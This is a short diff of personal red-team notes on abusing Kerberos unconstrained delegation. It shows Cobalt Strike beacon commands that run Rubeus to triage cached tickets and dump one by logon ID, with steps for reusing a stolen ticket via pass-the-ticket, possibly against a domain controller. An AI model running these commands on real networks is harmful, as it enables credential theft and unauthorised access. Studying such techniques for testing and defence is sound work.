SlyJose/Hacking-Notes/Hacking-Vault/Unconstrained Delegation.md

 `beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage`

 3) Analyze the tickets displayed, one of those could be related/interacting with one of the machines you want access into (maybe the DC).
-4) If you identify one potential candidate, dump it, then create a new process locally using the ticket:
+4) If you identify one potential candidate, dump it, then create a new process locally using the ticket ([[Pass the Ticket]]) :

 ```
 beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x14794e /nowrap